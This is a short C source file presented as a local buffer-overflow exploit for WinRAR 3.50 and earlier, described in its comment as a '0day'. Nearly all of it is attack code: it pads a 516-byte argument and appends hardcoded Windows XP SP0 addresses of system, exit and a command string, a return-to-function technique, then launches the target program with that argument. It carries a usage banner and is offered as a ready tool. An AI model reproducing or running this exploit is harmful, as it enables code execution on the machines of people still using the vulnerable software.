/*

local exploit for winrar <= 3.50 ENG version


bug is 0day :)

i'm used ret-2-func technique.

*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

int main ( int argc, char *argv[] )
{
   long sys_addr  = 0x77C18044; // winxp sp0 targets...
   long exit_addr = 0x77C27ADC;
   long cmd_addr  = 0x77C01335;

   char buf[3000];
   char cmd[3000];
   
   if ( argc < 2 )
   {
   printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version  *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
   exit(0);
   }

   memset(buf, 0x00, 3000);
   memset(cmd, 0x00, 3000);

   memset(buf, 0x55, 516);

   *(long*)&buf[strlen(buf)]  = sys_addr;
   *(long *)&buf[strlen(buf)] = exit_addr;
   *(long *)&buf[strlen(buf)] = cmd_addr;

   sprintf(cmd, "%s %s", argv[1], buf);
   system(cmd);

}